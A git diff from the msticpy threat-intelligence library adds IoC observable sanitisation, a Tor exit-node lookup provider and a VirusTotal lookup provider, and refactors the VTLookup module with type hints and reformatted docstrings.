+            IoC observable
+        ioc_type : str, optional
+            IoC type, by default None
+        query_subtype : str, optional
+            Query sub-type, if any, by default None
+
+        Returns
+        -------
+        LookupResult
+            Lookup result with resolved ioc_type and pre-processed
+            observable.
+            LookupResult.status is none-zero on failure.
+
+        """
+        result = LookupResult(
+            ioc=ioc,
+            safe_ioc=ioc,
+            ioc_type=ioc_type or self.resolve_ioc_type(ioc),
+            query_subtype=query_subtype,
+            result=False,
+            details="",
+            raw_result=None,
+            reference=None,
+        )
+
+        if not self.is_supported_type(result.ioc_type):
+            result.details = f"IoC type {result.ioc_type} not supported."
+            result.status = TILookupStatus.not_supported.value
+            return result
+
+        clean_ioc = preprocess_observable(
+            ioc, result.ioc_type, self.require_url_encoding
+        )
+
+        result.safe_ioc = clean_ioc.observable
+
+        if clean_ioc.status != "ok":
+            result.details = clean_ioc.status
+            result.status = TILookupStatus.bad_format.value
+
+        return result
+
+
+class TIPivotProvider(ABC):
+    """A class which provides pivot functions and a means of registering them."""
+
+    @abstractmethod
+    def register_pivots(
+        self,
+        pivot_reg: "PivotRegistration",  # type: ignore # noqa: F821
+        pivot: "Pivot",  # type: ignore # noqa: F821
+    ):
+        """
+        Register pivot functions for the TI Provider.
+
+        Parameters
+        ----------
+        pivot_reg : PivotRegistration
+            Pivot registration settings.
+        pivot : Pivot
+            Pivot library instance
+
+        """
+
+
+# slightly stricter than normal URL regex to exclude '() from host string
+_HTTP_STRICT_REGEX = r"""
+    (?P<protocol>(https?|ftp|telnet|ldap|file)://)
+    (?P<userinfo>([a-z0-9-._~!$&*+,;=:]|%[0-9A-F]{2})*@)?
+    (?P<host>([a-z0-9-._~!$&\*+,;=]|%[0-9A-F]{2})*)
+    (:(?P<port>\d*))?
+    (/(?P<path>([^?\#| ]|%[0-9A-F]{2})*))?
+    (\?(?P<query>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?
+    (\#(?P<fragment>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?\b"""
+
+_HTTP_STRICT_RGXC = re.compile(_HTTP_STRICT_REGEX, re.I | re.X | re.M)
+
+
+# pylint: disable=too-many-return-statements, too-many-branches
+def preprocess_observable(
+    observable, ioc_type, require_url_encoding: bool = False
+) -> SanitizedObservable:
+    """
+    Preprocesses and checks validity of observable against declared IoC type.
+
+        :param observable: the value of the IoC
+        :param ioc_type: the IoC type
+    """
+    observable = observable.strip()
+    try:
+        validated = _IOC_EXTRACT.validate(observable, ioc_type)
+    except KeyError:
+        validated = False
+    if not validated:
+        return SanitizedObservable(
+            None, "Observable does not match expected pattern for " + ioc_type
+        )
+    if ioc_type == "url":
+        return _preprocess_url(observable, require_url_encoding)
+    if ioc_type == "ipv4":
+        return _preprocess_ip(observable, version=4)
+    if ioc_type == "ipv6":
+        return _preprocess_ip(observable, version=6)
+    if ioc_type in ["dns", "hostname"]:
+        return _preprocess_dns(observable)
+    if ioc_type in ["md5_hash", "sha1_hash", "sha256_hash", "file_hash"]:
+        return _preprocess_hash(observable)
+    return SanitizedObservable(observable, "ok")
+
+
+# Would complicate code with too many branches
+# pylint: disable=too-many-return-statements
+def _preprocess_url(
+    url: str, require_url_encoding: bool = False
+) -> SanitizedObservable:
+    """
+    Check that URL can be parsed.
+
+    Parameters
+    ----------
+    url : str
+        The URL to check
+    require_url_encoding : bool
+        Set to True if url's require encoding before passing to provider
+
+    Returns
+    -------
+    SanitizedObservable
+        Pre-processed result
+
+    """
+    clean_url, scheme, host = get_schema_and_host(url, require_url_encoding)
+
+    if scheme is None or host is None:
+        return SanitizedObservable(None, f"Could not obtain scheme or host from {url}")
+    # get rid of some obvious false positives (localhost, local hostnames)
+    try:
+        addr = ip_address(host)
+        if addr.is_private:
+            return SanitizedObservable(None, "Host part of URL is a private IP address")
+        if addr.is_loopback:
+            return SanitizedObservable(
+                None, "Host part of URL is a loopback IP address"
+            )
+    except ValueError:
+        pass
+
+    if "." not in host:
+        return SanitizedObservable(None, "Host is unqualified domain name")
+
+    if scheme.lower() in ["file"]:
+        return SanitizedObservable(None, f"{scheme} URL scheme is not supported")
+
+    return SanitizedObservable(clean_url, "ok")
+
+
+def get_schema_and_host(
+    url: str, require_url_encoding: bool = False
+) -> Tuple[Optional[str], Optional[str], Optional[str]]:
+    """
+    Return URL scheme and host and cleaned URL.
+
+    Parameters
+    ----------
+    url : str
+        Input URL
+    require_url_encoding : bool
+        Set to True if url needs encoding. Defualt is False.
+
+    Returns
+    -------
+    Tuple[Optional[str], Optional[str], Optional[str]
+        Tuple of URL, scheme, host
+
+    """
+    clean_url = None
+    scheme = None
+    host = None
+    try:
+        scheme, _, host, _, _, _, _ = parse_url(url)
+        clean_url = url
+    except LocationParseError:
+        # Try to clean URL and re-check
+        cleaned_url = _clean_url(url)
+        if cleaned_url is not None:
+            try:
+                scheme, _, host, _, _, _, _ = parse_url(cleaned_url)
+                clean_url = cleaned_url
+            except LocationParseError:
+                pass
+    if require_url_encoding and clean_url:
+        clean_url = quote_plus(clean_url)
+    return clean_url, scheme, host
+
+
+def _clean_url(url: str) -> Optional[str]:
+    """
+    Clean URL to remove query params and fragments and any trailing stuff.
+
+    Parameters
+    ----------
+    url : str
+        the URL to check
+
+    Returns
+    -------
+    Optional[str]
+        Cleaned URL or None if the input was not a valid URL
+
+    """
+    # Try to clean URL and re-check
+    match_url = _HTTP_STRICT_RGXC.search(url)
+    if (
+        not match_url
+        or match_url.groupdict()["protocol"] is None
+        or match_url.groupdict()["host"] is None
+    ):
+        return None
+
+    # build the URL dropping the query string and fragments
+    clean_url = match_url.groupdict()["protocol"]
+    if match_url.groupdict()["userinfo"]:
+        clean_url += match_url.groupdict()["userinfo"]
+    clean_url += match_url.groupdict()["host"]
+    if match_url.groupdict()["port"]:
+        clean_url += ":" + match_url.groupdict()["port"]
+    if match_url.groupdict()["path"]:
+        clean_url += "/" + match_url.groupdict()["path"]
+
+    return clean_url
+
+
+# Would complicate code with too many branches
+# pylint: disable=too-many-return-statements
+def _preprocess_ip(ipaddress: str, version=4):
+    """Ensure Ip address is a valid public IPv4 address."""
+    try:
+        addr = ip_address(ipaddress)
+    except ValueError:
+        return SanitizedObservable(None, "IP address is invalid format")
+
+    if version == 4 and not isinstance(addr, IPv4Address):
+        return SanitizedObservable(None, "Not an IPv4 address")
+    if version == 6 and not isinstance(addr, IPv6Address):
+        return SanitizedObservable(None, "Not an IPv6 address")
+    if addr.is_global:
+        return SanitizedObservable(ipaddress, "ok")
+
+    return SanitizedObservable(None, "IP address is not global")
+
+
+def _preprocess_dns(domain: str) -> SanitizedObservable:
+    """Ensure DNS is a valid-looking domain."""
+    if "." not in domain:
+        return SanitizedObservable(None, "Domain is unqualified domain name")
+    try:
+        addr = ip_address(domain)
+        del addr
+        return SanitizedObservable(None, "Domain is an IP address")
+    except ValueError:
+        pass
+
+    return SanitizedObservable(domain, "ok")
+
+
+def _preprocess_hash(hash_str: str) -> SanitizedObservable:
+    """Ensure Hash has minimum entropy (rather than a string of 'x')."""
+    str_entropy = entropy(hash_str)
+    if str_entropy < 3.0:
+        return SanitizedObservable(None, "String has too low an entropy to be a hash")
+    return SanitizedObservable(hash_str, "ok")
+
+
+def entropy(input_str: str) -> float:
+    """Compute entropy of input string."""
+    str_len = float(len(input_str))
+    return -sum(
+        map(
+            lambda a: (a / str_len) * math.log2(a / str_len),
+            Counter(input_str).values(),
+        )
+    )
+
+
+@singledispatch
+def generate_items(
+    data: Any, obs_col: Optional[str] = None, ioc_type_col: Optional[str] = None
+) -> Iterable[Tuple[Optional[str], Optional[str]]]:
+    """
+    Generate item pairs from different input types.
+
+    Parameters
+    ----------
+    data : Any
+        DataFrame, dictionary or iterable
+    obs_col : Optional[str]
+        If `data` is a DataFrame, the column containing the observable value.
+    ioc_type_col : Optional[str]
+        If `data` is a DataFrame, the column containing the observable type.
+
+    Returns
+    -------
+    Iterable[Tuple[Optional[str], Optional[str]]]] - a tuple of Observable/Type.
+
+    """
+    del obs_col, ioc_type_col
+
+    if isinstance(data, collections.abc.Iterable):
+        for item in data:
+            yield item, TIProvider.resolve_ioc_type(item)
+    else:
+        yield None, None
+
+
+@generate_items.register(pd.DataFrame)
+def _(data: pd.DataFrame, obs_col: str, ioc_type_col: Optional[str] = None):
+    for _, row in data.iterrows():
+        if ioc_type_col is None:
+            yield row[obs_col], TIProvider.resolve_ioc_type(row[obs_col])
+        else:
+            yield row[obs_col], row[ioc_type_col]
+
+
+@generate_items.register(dict)  # type: ignore
+def _(data: dict, obs_col: Optional[str] = None, ioc_type_col: Optional[str] = None):
+    for obs, ioc_type in data.items():
+        if not ioc_type:
+            ioc_type = TIProvider.resolve_ioc_type(obs)
+        yield obs, ioc_type
diff --git a/msticpy/sectools/tiproviders/tor_exit_nodes.py b/msticpy/sectools/tiproviders/tor_exit_nodes.py
new file mode 100644
index 000000000..e1f223d80
--- /dev/null
+++ b/msticpy/sectools/tiproviders/tor_exit_nodes.py
@@ -0,0 +1,143 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Tor Exit Nodes Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from datetime import datetime
+from threading import Lock
+from typing import Tuple, Iterable, Dict, Any
+
+import httpx
+
+from .ti_provider_base import TIProvider, LookupResult, TISeverity, TILookupStatus
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class Tor(TIProvider):
+    """Tor Exit Nodes Lookup."""
+
+    _BASE_URL = "https://check.torproject.org/exit-addresses"
+
+    _IOC_QUERIES: dict = {"ipv4": None}
+    _nodelist: Dict[str, Dict[str, str]] = {}
+    _last_cached = datetime.min
+    _cache_lock = Lock()
+
+    def __init__(self, **kwargs):
+        """Instantiate Tor class."""
+        super().__init__(**kwargs)
+        self._check_and_get_nodelist()
+
+    @classmethod
+    def _check_and_get_nodelist(cls):
+        """Pull down Tor exit node list and save to internal attribute."""
+        if cls._cache_lock.locked():
+            return
+        now = datetime.utcnow()
+        if not cls._nodelist or (now - cls._last_cached).days > 1:
+            try:
+                resp = httpx.get(cls._BASE_URL)
+                tor_raw_list = resp.content.decode()
+                with cls._cache_lock:
+                    cls._nodelist = dict(cls._tor_splitter(tor_raw_list))
+                    cls._last_cached = datetime.utcnow()
+            except ConnectionError:
+                pass
+
+    @staticmethod
+    def _tor_splitter(node_list) -> Iterable[Tuple[str, Dict[str, str]]]:
+        node_dict: Dict[str, str] = {}
+        for line in node_list.split("\n"):
+            if not line:
+                continue
+            fields = line.split(" ", 2)
+            if fields[0] == "ExitNode":
+                # new record so reset dict
+                node_dict = {}
+            node_dict[fields[0]] = fields[1] if len(fields) > 1 else None
+            if fields[0] == "ExitAddress":
+                # yield tuple
+                yield fields[1], node_dict
+
+    def lookup_ioc(
+        self, ioc: str, ioc_type: str = None, query_type: str = None, **kwargs
+    ) -> LookupResult:
+        """
+        Lookup a single IoC observable.
+
+        Parameters
+        ----------
+        ioc : str
+            IoC Observable value
+        ioc_type : str, optional
+            IoC Type, by default None (type will be inferred)
+        query_type : str, optional
+            Specify the data subtype to be queried, by default None.
+            If not specified the default record type for the IoC type
+            will be returned.
+
+        Returns
+        -------
+        LookupResult
+            The returned results.
+
+        """
+        result = self._check_ioc_type(
+            ioc=ioc, ioc_type=ioc_type, query_subtype=query_type
+        )
+
+        result.provider = kwargs.get("provider_name", self.__class__.__name__)
+        result.result = bool(self._nodelist)
+        result.reference = self._BASE_URL
+
+        if result.status and not bool(self._nodelist):
+            result.status = TILookupStatus.query_failed.value
+
+        if result.status:
+            return result
+
+        tor_node = self._nodelist.get(ioc)
+
+        if tor_node:
+            result.set_severity(TISeverity.warning)
+            result.details = {
+                "NodeID": tor_node["ExitNode"],
+                "LastStatus": tor_node["LastStatus"],
+            }
+            result.raw_result = tor_node
+        else:
+            result.details = "Not found."
+        return result
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        return (True, TISeverity.information, None)
diff --git a/msticpy/sectools/tiproviders/virustotal.py b/msticpy/sectools/tiproviders/virustotal.py
new file mode 100644
index 000000000..9979242c2
--- /dev/null
+++ b/msticpy/sectools/tiproviders/virustotal.py
@@ -0,0 +1,162 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+VirusTotal Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+import datetime as dt
+from typing import Any, Tuple, Dict
+
+from .ti_provider_base import LookupResult, TISeverity
+from .http_base import HttpProvider, IoCLookupParams
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_DEF_HEADERS = {"User-Agent": "VirusTotal", "Content-Type": "application/json"}
+_GZIP_HEADERS = {"Accept-Encoding": "gzip, deflate"}
+
+
+@export
+class VirusTotal(HttpProvider):
+    """VirusTotal Lookup."""
+
+    _BASE_URL = "https://www.virustotal.com/"
+
+    _PARAMS = {"apikey": "{API_KEY}"}
+    _IOC_QUERIES = {
+        "ipv4": IoCLookupParams(
+            path="vtapi/v2/ip-address/report",
+            params={**_PARAMS, "ip": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "dns": IoCLookupParams(
+            path="vtapi/v2/domain/report",
+            params={**_PARAMS, "domain": "{observable}"},
+            headers=_DEF_HEADERS,
+        ),
+        "file_hash": IoCLookupParams(
+            path="vtapi/v2/file/report",
+            params={**_PARAMS, "resource": "{observable}"},
+            headers={**_DEF_HEADERS, **_GZIP_HEADERS},
+        ),
+        "url": IoCLookupParams(
+            path="vtapi/v2/url/report",
+            params={**_PARAMS, "resource": "{observable}"},
+            headers={**_DEF_HEADERS, **_GZIP_HEADERS},
+        ),
+    }
+
+    # pylint: disable=duplicate-code, too-many-branches
+    # aliases
+    _IOC_QUERIES["md5_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha1_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha256_hash"] = _IOC_QUERIES["file_hash"]
+
+    _REQUIRED_PARAMS = ["API_KEY"]
+
+    _VT_DETECT_RESULTS = {
+        "detected_urls": ("url", "scan_date"),
+        "detected_downloaded_samples": ("sha256", "date"),
+        "detected_communicating_samples": ("sha256", "date"),
+    }
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        if self._failed_response(response) or not isinstance(response.raw_result, dict):
+            return False, TISeverity.information, "Not found."
+
+        result_dict = {
+            "verbose_msg": response.raw_result.get("verbose_msg", None),
+            "response_code": response.raw_result.get("response_code", None),
+            "positives": 0,
+        }
+
+        if response.ioc_type in [
+            "url",
+            "md5_hash",
+            "sha1_hash",
+            "sha256_hash",
+            "file_hash",
+        ]:
+            result_dict["resource"] = response.raw_result.get("resource", None)
+            result_dict["permalink"] = response.raw_result.get("permalink", None)
+            result_dict["positives"] = response.raw_result.get("positives", 0)
+
+        else:
+            for hit_type, params in self._VT_DETECT_RESULTS.items():
+                if hit_type in response.raw_result:
+                    self._extract_url_results(
+                        response=response,
+                        result_dict=result_dict,
+                        hit_type=hit_type,
+                        item_type=params[0],
+                        date_name=params[1],
+                    )
+
+        if "positives" in result_dict:
+            if result_dict["positives"] > 1:
+                severity = TISeverity.high
+            elif result_dict["positives"] > 0:
+                severity = TISeverity.warning
+            else:
+                severity = TISeverity.information
+        else:
+            severity = TISeverity.unknown
+
+        return True, severity, result_dict
+
+    # pylint: enable=duplicate-code, too-many-branches
+
+    @staticmethod
+    def _extract_url_results(
+        response: LookupResult,
+        result_dict: Dict[str, Any],
+        hit_type: str,
+        item_type: str,
+        date_name: str,
+    ):
+        if not isinstance(response.raw_result, dict):
+            return
+        time_scope = dt.datetime.now() - dt.timedelta(days=30)
+        result_dict[hit_type] = [
+            item[item_type]
+            for item in response.raw_result[hit_type]
+            if item_type in item
+            and dt.datetime.strptime(item[date_name], "%Y-%m-%d %H:%M:%S") > time_scope
+        ]
+        # positives are listed per detected_url so we need to
+        # pull those our and sum them.
+        positives = sum(
+            item["positives"]
+            for item in response.raw_result[hit_type]
+            if "positives" in item
+            and dt.datetime.strptime(item[date_name], "%Y-%m-%d %H:%M:%S") > time_scope
+        )
+        result_dict["positives"] += positives
diff --git a/msticpy/sectools/vtlookup.py b/msticpy/sectools/vtlookup.py
index 8d9157511..2fdfbcfda 100644
--- a/msticpy/sectools/vtlookup.py
+++ b/msticpy/sectools/vtlookup.py
@@ -3,34 +3,53 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""Module for VTLookup class."""
-
+"""
+Module for VTLookup class.
+
+Wrapper class around `Virus Total
+API <https://www.virustotal.com/en/documentation/public-api/>`__. Input
+can be a single IoC observable or a pandas DataFrame containing multiple
+observables. Processing requires a Virus Total account and API key and
+processing performance is limited to the number of requests per minute
+for the account type that you have. Support IoC Types:
+
+-  Filehash
+-  URL
+-  DNS Domain
+-  IPv4 Address
+
+"""
+# pylint: disable=too-many-lines
 import json
 from json import JSONDecodeError
-import math
-import re
-from collections import namedtuple, Counter
-from ipaddress import IPv4Address, ip_address
+from typing import List, Mapping, Any, Dict, Optional, Tuple
+from collections import namedtuple
 
 import pandas as pd
-import requests
-from urllib3.exceptions import LocationParseError
-from urllib3.util import parse_url
+import httpx
 
-from . iocextract import IoCExtract
-from .. nbtools.utility import export, pd_version_23
-from .. _version import VERSION
+from .iocextract import IoCExtract
+from .tiproviders.ti_provider_base import SanitizedObservable, preprocess_observable
+from ..common.utility import export
+from .._version import VERSION
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 # VirusTotal parameter collection
-VTParams = namedtuple('VTParams',
-                      ['api_type', 'batch_size', 'batch_delimiter',
-                       'http_verb', 'api_var_name', 'headers'])
+VTParams = namedtuple(
+    "VTParams",
+    [
+        "api_type",
+        "batch_size",
+        "batch_delimiter",
+        "http_verb",
+        "api_var_name",
+        "headers",
+    ],
+)
 
-DuplicateStatus = namedtuple('DuplicateStatus', ['is_dup', 'status'])
-PreProcessResult = namedtuple('PreProcessResult', ['observable', 'status'])
+DuplicateStatus = namedtuple("DuplicateStatus", ["is_dup", "status"])
 
 
 @export
@@ -52,44 +71,76 @@ class VTLookup:
     """
 
     # Ioc types that we support
-    _SUPPORTED_INPUT_TYPES = ['ipv4', 'dns', 'url', 'md5_hash',
-                              'sha1_hash', 'sh256_hash']
+    _SUPPORTED_INPUT_TYPES: List[str] = [
+        "ipv4",
+        "dns",
+        "url",
+        "md5_hash",
+        "sha1_hash",
+        "sh256_hash",
+    ]
 
     # Mapping to to VT Types
-    _VT_TYPE_MAP = {'ipv4': 'ip-address',
-                    'ipv6': None,
-                    'dns': 'domain',
-                    'url': 'url',
-                    'md5_hash': 'file',
-                    'sha1_hash': 'file',
-                    'sh256_hash': 'file'}
+    _VT_TYPE_MAP: Dict[str, str] = {
+        "ipv4": "ip-address",
+        "dns": "domain",
+        "url": "url",
+        "md5_hash": "file",
+        "sha1_hash": "file",
+        "sh256_hash": "file",
+    }
 
     # VT API parameters
     _HDR_GZIP = {"Accept-Encoding": "gzip, deflate"}
-    _VT_API = 'https://www.virustotal.com/vtapi/v2/{type}/report'
-    _VT_API_TYPES = {'url': VTParams('url', 1, '\n', 'post', 'resource', _HDR_GZIP),
-                     'file': VTParams('file', 25, ',', 'post', 'resource', _HDR_GZIP),
-                     'ip-address': VTParams('ip-address', 1, '', 'get', 'ip', None),
-                     'domain': VTParams('domain', 1, '', 'get', 'domain', None)}
-
-    _RESULT_COLUMNS = ['Observable', 'IoCType', 'Status', 'ResponseCode', 'RawResponse',
-                       'Resource', 'SourceIndex', 'VerboseMsg', 'Resource', 'ScanId',
-                       'Permalink', 'Positives', 'MD5', 'SHA1', 'SHA256',
-                       'ResolvedDomains', 'ResolvedIPs', 'DetectedUrls']
-
-    def __init__(self, vtkey, verbosity=1):
+    _VT_API = "https://www.virustotal.com/vtapi/v2/{type}/report"
+    _VT_API_TYPES: Dict[str, VTParams] = {
+        "url": VTParams("url", 1, "\n", "get", "resource", _HDR_GZIP),
+        "file": VTParams("file", 25, ",", "get", "resource", _HDR_GZIP),
+        "ip-address": VTParams("ip-address", 1, "", "get", "ip", None),
+        "domain": VTParams("domain", 1, "", "get", "domain", None),
+    }
+
+    _RESULT_COLUMNS: List[str] = [
+        "Observable",
+        "IoCType",
+        "Status",
+        "ResponseCode",
+        "RawResponse",
+        "Resource",
+        "SourceIndex",
+        "VerboseMsg",
+        "Resource",
+        "ScanId",
+        "Permalink",
+        "Positives",
+        "MD5",
+        "SHA1",
+        "SHA256",
+        "ResolvedDomains",
+        "ResolvedIPs",
+        "DetectedUrls",
+    ]
+
+    _http_strict_rgxc = None  # type: Any
+
+    def __init__(self, vtkey: str, verbosity: int = 1):
         """
         Create a new instance of VTLookup class.
 
-            :param vtkey: VirusTotal API key
-            :param verbosity: The level of detail of reporting
+        Parameters
+        ----------
+        vtkey : str
+            VirusTotal API key
+        verbosity : int, optional
+            The level of detail of reporting
                 0 = no reporting
                 1 = minimal reporting (default)
                 2 = verbose reporting
+
         """
         self._vtkey = vtkey
         self._verbosity = verbosity
-        self._ioc_custom_type_map = {}
+        self._ioc_custom_type_map = {}  # type: Dict[str, Optional[str]]
 
         self._ioc_extract = IoCExtract()
 
@@ -97,53 +148,102 @@ def __init__(self, vtkey, verbosity=1):
         self.results = pd.DataFrame(data=None, columns=self._RESULT_COLUMNS)
 
     @property
-    def supported_ioc_types(self) -> list({str}):
-        """Return list of supported IoC type internal names."""
+    def supported_ioc_types(self) -> List[str]:
+        """
+        Return list of supported IoC type internal names.
+
+        Returns
+        -------
+        List[str]
+            List of supported IoC type internal names.
+
+        """
         return self._SUPPORTED_INPUT_TYPES
 
     @property
-    def supported_vt_types(self) -> list({str}):
-        """Return list of VirusTotal supported IoC type names."""
+    def supported_vt_types(self) -> List[str]:
+        """
+        Return list of VirusTotal supported IoC type names.
+
+        Returns
+        -------
+        List[str]
+            List of VirusTotal supported IoC type names.
+
+        """
         return list(self._VT_API_TYPES.keys())
 
-# flake8: noqa: D102
     @property
-    def ioc_vt_type_mapping(self) -> dict({str: str}):
-        """Return mapping between internal and VirusTotal IoC type names."""
+    def ioc_vt_type_mapping(self) -> Dict[str, str]:
+        """
+        Return mapping between internal and VirusTotal IoC type names.
+
+        Returns
+        -------
+        Mapping[str, str]
+            Return mapping between internal and VirusTotal IoC type names.
+
+        """
         return self._VT_TYPE_MAP
 
-    def lookup_iocs(self, data: pd.DataFrame, src_col: str = 'Observable',
-                    type_col: str = 'IoCType', src_index_col: str = 'SourceIndex',
-                    **kwargs) -> pd.DataFrame:
+    def lookup_iocs(
+        self,
+        data: pd.DataFrame,
+        src_col: str = "Observable",
+        type_col: str = "IoCType",
+        src_index_col: str = "SourceIndex",
+        **kwargs,
+    ) -> pd.DataFrame:
         """
-        lookup_iocs: main lookup method.
-
-        Tries to retrieve results for IoC observables in the source dataframe.
-
-            :param data: dataframe containing the observables to search for
-            :param src_col: the column name that contains the observable data
-                (one item per row)
-            :param type_col: the column name containing the observable type
-            :param source_index: the name of the column to use as source index. If not
-                specified this defaults to 'SourceIndex'. If this (or the supplied value)
-                is not in the source dataframe the index of the source dataframe will
-                be used. This is retained in the output so that you can join the results
-                back to the original data.
-            :param kwargs: key/value pairs of additional mappings to supported IoC type names
-                e.g. ipv4='ipaddress', url='httprequest'. This allows you to specify custom
-                mappings when the source data is tagged with different names.
-
-        Returns:
-            pd.DataFrame: VT Results
-
-        See supported_ioc_types attribute for a list of valid target types.
-        Not all of these types are supported by VirusTotal. See ioc_vt_type_mapping for
-        current mappings. Types mapped to None will not be submitted to VT.
-
-        For urls a full http request can be submitted, query string and fragments will be
-        dropped before submitting. Other supported protocols are ftp, telnet, ldap, file
-        For files MD5, SHA1 and SHA256 hashes are supported.
-        For IP addresses only dotted IPv4 addresses are supported.
+        Retrieve results for IoC observables in the source dataframe.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            Dataframe containing the observables to search for
+        src_col : str, optional
+            The column name that contains the observable data
+            (one item per row) (the default is 'Observable')
+        type_col : str, optional
+            The column name containing the observable type
+            (the default is 'IoCType')
+        src_index_col : str, optional
+            The name of the column to use as source index. If not
+            specified this defaults to 'SourceIndex'. If this (or the supplied value)
+            is not in the source dataframe, the index of the source dataframe will
+            be used. This is retained in the output so that you can join the results
+            back to the original data.
+            (the default is 'SourceIndex')
+
+        Other Parameters
+        ----------------
+            key/value pairs of additional mappings to supported IoC type names
+            e.g. ipv4='ipaddress', url='httprequest'.
+            This allows you to specify custom
+            mappings when the source data is tagged with different names.
+
+        Returns
+        -------
+        pd.DataFrame
+            Combined results of local pre-processing and VirusTotal Lookups
+
+        Raises
+        ------
+        KeyError
+            Unknown ioc_type
+
+        Notes
+        -----
+            See supported_ioc_types attribute for a list of valid target types.
+            Not all of these types are supported by VirusTotal.
+            See ioc_vt_type_mapping for current mappings.
+            Types mapped to None will not be submitted to VT.
+
+            For urls a full http request can be submitted, query string
+            and fragments will be dropped before submitting.
+            Other supported protocols are ftp, telnet, ldap, file
+            For files MD5, SHA1 and SHA256 hashes are supported.
+            For IP addresses only dotted IPv4 addresses are supported.
 
         """
         # if the caller has supplied alternative type name mappings add any of these
@@ -154,83 +254,121 @@ def lookup_iocs(self, data: pd.DataFrame, src_col: str = 'Observable',
             if k in self._get_supported_vt_ioc_types():
                 self._ioc_custom_type_map[k] = val
 
-        if src_index_col not in data:
-            src_index_col = None
+        src_idx_col = src_index_col if src_index_col in data else None
 
         # for each ioc_type, retrieve observables from dataframe
         for ioc_type, mapped_type in self._ioc_custom_type_map.items():
             input_df = data[data[type_col] == mapped_type]
-            self._lookup_ioc_type(input_df, ioc_type, src_col, src_index_col)
+            self._lookup_ioc_type(input_df, ioc_type, src_col, src_idx_col)
 
         self._print_status(
-            'Submission complete. {} responses from {} input rows'
-            .format(len(self.results), len(data)), 2)
+            f"Submission complete. {len(self.results)} "
+            f"responses from {len(data)} input rows",
+            2,
+        )
 
         return self.results
 
-    def lookup_ioc(self, observable: str, ioc_type: str, output: str = 'dict'):
+    def lookup_ioc(self, observable: str, ioc_type: str, output: str = "dict") -> Any:
         """
         Look up and single IoC observable.
 
-            :param observable: The observable value
-            :param ioc_type: The IoC Type (see 'supported_ioc_types' attribute)
-            :param output='dict': Output results as a dictionary (or list of dicts)
-                if output is any other value the result will be returned in a
-                Pandas DataFrame
-
-            Returns:
-                list{dict}: if output == 'dict'
-                pd.DataFrame: otherwise
+        Parameters
+        ----------
+        observable : str
+            The observable value
+        ioc_type : str
+            The IoC Type (see 'supported_ioc_types' attribute)
+        output : str, optional
+            Output results as a dictionary (or list of dicts)
+            if `output` is any other value the result will be returned in a
+            Pandas DataFrame (the default is 'dict')
+
+        Returns
+        -------
+            list{dict}: if output == 'dict'
+            pd.DataFrame: otherwise
+
+        Raises
+        ------
+        KeyError
+            Unknown ioc_type
 
         """
         # Check input
-        if (observable is None or observable.strip() is None or
-                ioc_type is None or ioc_type.strip() is None):
+        if (
+            observable is None
+            or observable.strip() is None
+            or ioc_type is None
+            or ioc_type.strip() is None
+        ):
             raise SyntaxError("Invalid value for observable or ioc_type")
 
-        observable, status = self._preprocess_observable(observable, ioc_type)
+        observable, status = preprocess_observable(observable, ioc_type)
         if observable is None:
-            raise SyntaxError(
-                '{} for observable value {}'.format(status, observable), 1)
+            raise SyntaxError(f"{status} for observable value {observable}")
 
         if ioc_type not in self._VT_TYPE_MAP:
-            raise LookupError('IoC Type {} not recognized. Valid types are [{}]'.format(
-                ioc_type, ', '.join(self.supported_ioc_types)))
+            raise LookupError(
+                f"IoC Type {ioc_type} not recognized.",
+                f"Valid types are [{', '.join(self.supported_ioc_types)}]",
+            )
 
         if self._VT_TYPE_MAP[ioc_type] not in self._VT_API_TYPES:
             vt_types = {
-                k for k, val in self.ioc_vt_type_mapping if val is not None}
-            err = 'IoC Type {} is recognized by VirusTotal. Valid types are [{}]'.format(
-                ioc_type, ', '.join(vt_types))
+                k for k, val in self.ioc_vt_type_mapping.items() if val is not None
+            }
+            err = (
+                f"IoC Type {ioc_type} is recognized by VirusTotal.",
+                f"Valid types are [{'', ''.join(vt_types)}]",
+            )
             raise LookupError(err)
 
         # do the submission
-        vt_param = self._VT_API_TYPES[self._VT_TYPE_MAP[ioc_type]]
-        results = self._vt_submit_request(observable, vt_param)
+        vt_api_type = self._VT_TYPE_MAP[ioc_type]
+        vt_param = self._VT_API_TYPES[vt_api_type]
+        results, _ = self._vt_submit_request(observable, vt_param)
         self._parse_vt_results(results, observable, ioc_type)
 
         # return as a list of dictionaries or a DataFrame
-        if output == 'dict':
-            list_res = self.results.apply(
